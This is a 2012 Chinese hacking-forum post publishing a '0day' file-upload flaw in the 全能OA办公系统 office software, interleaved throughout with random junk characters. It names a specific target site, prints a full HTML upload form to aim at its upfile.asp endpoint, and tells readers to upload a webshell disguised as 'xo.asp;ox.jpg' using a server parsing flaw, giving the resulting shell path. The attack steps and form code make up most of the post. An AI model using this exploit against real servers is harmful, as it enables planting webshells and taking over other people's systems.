找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2306|回复: 0
打印 上一主题 下一主题

全能OA办公系统0day OA办公系统漏洞 上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-21 13:45:12 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
全能OA办公系统 上传漏洞' m5 e. }, k& c1 O
* h' l8 u0 q, j, m: c
系统介绍:
: v- ]9 G4 v+ f' x8 N: @  l4 m1 m. P7 }2 h: O7 l2 e
全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。! P& g7 n4 @+ h% Z% G  F& s
% {, u, L  H2 t. @5 G2 G6 b) z
主要功能:5 k& F6 }! W& ]) Y
公司通告 + y2 }/ f9 A, A8 A
工作计划
1 x! k1 g/ t$ d& P1 Z: i通讯助理
4 F4 d2 j7 {1 u" J客户资源 4 ]0 O( l* Y& l! a' U
我的公文
; R& N8 _  h: V. n7 r公文传阅 ' Y* d7 B" _4 o8 {% G9 S$ q" d( I% V
公共资源
6 D' i8 F  j: w资源预约
8 W' y1 r5 O  c. c$ C0 c6 x6 \% `# V' ]& z今日考勤
# V- {! d) h9 n& {# O( ]+ _5 h个人计划
& U! k2 ^1 a! j* b, L+ {; K个人通讯录 0 P& T6 B3 b" F4 {* h
个人基本档案 ( ^- h' A0 g* N, l
未读邮件
8 a" b7 v# g! N发邮件 ( {' k& S  _- ]6 F; Z
收件夹
  T/ `/ T* ^* M2 O  v( E寄件夹
; V4 ]% V/ [/ P5 ]8 Z网络硬盘
$ j" A; [0 M! J' o网络会议
( `6 J% m; G  B/ X  g3 {; L7 d* s网络调查 $ t: ]( _: i# a* i" L- F1 e3 X
交流论坛
6 q  z! B( E& `7 q9 ]1 m- h) ^' a
有兴趣测试的朋友可以下源码看看
4 [# @* ?$ Y# D- @6 F7 q
  [2 m& D; b. g! q9 y- f源码下载:
  r6 F0 }5 g. c/ \" G& ^
0 @$ s4 g7 |9 ~5 ~" Mhttp://www.mycodes.net/30/4750.htm, V3 n( Z6 r" F& Q4 K# h& {2 S

$ b8 ~: |4 u/ @漏洞介绍:
" c% J3 ?4 B1 e- w" |: Z3 h" r) c- i6 V# h
由upfile.asp上传文件漏洞引起* S: m6 @" W5 E6 L7 }
% M$ h/ F: m5 b. S! @+ \
测试方法:. R. c$ @/ ?8 V. [/ s9 N: F$ y6 R0 S

' N( r" w) K, v4 f- X$ [3 i6 m使用名小子上传http://www.itlynn.com/upfile.asp即可
8 X; b* C; N9 Z# F* H$ l/ e0 s/ x+ p9 g$ N% j
如果upfile.asp文件被删除不存在。- @2 ^' \5 @( w' O4 p6 P, `. d
8 n# x! C6 E& K8 U! k2 N  T! f% Z" S
  那么可以试着访问http://www.itlynn.com/upfile/upfile.asp
! {) |! u& H3 l3 |6 I9 V
( A' N* \6 N1 v( D( e& m& h如果存在那么将如下代码保存为upfile.html。) R( l$ k+ j* O+ D7 w! q9 V

+ p0 P: z4 {+ m/ r; x然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp
/ j; k  c3 ~  J( A& d  i, K8 Z) O& O3 A' {( [/ _

; q& ~2 T7 ?/ y3 K9 O" }3 L( Z! \1 G: J7 F1 D3 H
01 <table border='0' align="center" cellpadding="5"> 6 O1 x- e* v- R! S

4 h  ]& f7 Q/ [3 j02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1"> 1 Y, P* r8 N& Q
% Q" {$ y6 O7 g
03 <tr>
) B& M4 _0 {" `* s0 j1 R* X2 r( i& M, L* [) ^; Q" G
04             <td>报错:</td>
. J9 D9 `3 L, n$ F2 T* ?4 _$ ^$ B0 D' C' Y* N/ q6 [
05             <td><input type='radio' name='errnumber' value='0'>
" B+ W( ?) s  D7 W5 Y! M: _
, a, F3 r# P+ J+ b) d06               自动更名 2 m( _% W$ w* }# T6 a0 ]! z

" _7 m" N6 K" W! F$ E0 n; u4 d07               <input type='radio' name='errnumber' value='1' checked>
! W6 K; \& ~# u8 f& \. l) j1 o3 e& s9 [$ J( ]
08               报错方式
# ^4 D- A# u- x, ?; p3 \# L6 B0 L) Y" [; N' J, B. A: r  Y
09               <input type='radio' name='errnumber' value='2'>
4 h0 E7 ?2 ^& X; k" n8 K4 a; o8 E( ~1 e% s2 E9 N9 ~! \
10               直接覆盖</td>   S' ^" Y' z2 i, a) e( `6 Z2 I
# Z0 m  a2 W$ b, x8 {" `
11           </tr> 9 w" }, e1 K8 l1 b4 b8 j: f
. A' i" M2 h+ k) I6 E
12           <tr>
( }, q. g% c; D  {. q' b' M8 ?6 C% K: }" x6 {( I' J
13             <td>主题:</td> * ?6 f, q% C9 c& J

' k% t( o0 L. {3 N6 K. `7 j14             <td><input type='text' name='filename' size='30'></td>
2 J) _% T3 d' @1 Y& @" W( [* d/ J" J. D, c, [7 r, ~: r8 i
15           </tr> 4 `, z8 c2 S4 A1 a3 U" K3 a

) F$ Z) b& n/ x7 T7 n5 @16           <tr>
' }* n  L" g: P2 F# f% e; ?/ D4 j( y6 F5 _9 M
17             <td>文件:</td> # _1 w& F  @# x: y

5 D# a0 W3 |; L6 M& h. v, y18             <td><input type="file"name="fruit"size="30"></td> " G9 u. U$ _* |& `& @- |' t

+ g$ H6 p" e( Z* `! p19           </tr>
' A6 u, O1 |4 R( s+ b' |% f7 T
( Z8 W9 k) o8 i* d) J0 ~20           <tr> 4 o" \; ]$ c9 ?* k
8 Y0 M( I3 ^/ i
21             <td valign='top'>简介:</td>
5 l/ u* ^- I2 }+ `. }
0 [5 \% J* _8 \& {( {2 `# o22             <td><textarea name='fileExt' cols='40' rows='5'></textarea></td>
1 B1 d9 ]( }$ v% s2 E1 s2 r: ?
* M& m9 _4 D- c/ y9 I23           </tr> 1 P# O* j" W% h9 N7 ~
4 z& ~, q& s8 {" Y3 ?
24   4 o- P4 `5 u3 c
- U  |" {4 C: O* U
25             <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td>
' u; j! w( c/ j4 o9 v' r- W
4 l. ]9 j. E& x, Q$ b8 o" m26           </tr>
; l0 N2 ]  V& n. E% ~% U. d+ Z- N+ j& b9 e
27         </form> 3 \( X; _: F: e! Y. n

- X' }7 u: [7 }6 k( ~7 ]6 o然后打开上传一个文件名为xo.asp;ox.jpg的文件。" B8 m; u3 U! @) e
. R/ h7 Z2 z& |3 Q  ]2 p
* M5 n( A6 n2 K5 A

& O! v8 F+ @$ v  j1 b8 K7 {8 S上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg# S& M) l, ^( N" j3 Y
! ^! |) {0 l) u7 U) @
此漏洞需要配合解析漏洞利用。
' E& b, ~+ t1 [  X. `: l3 u% r$ s5 ]. |; y
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表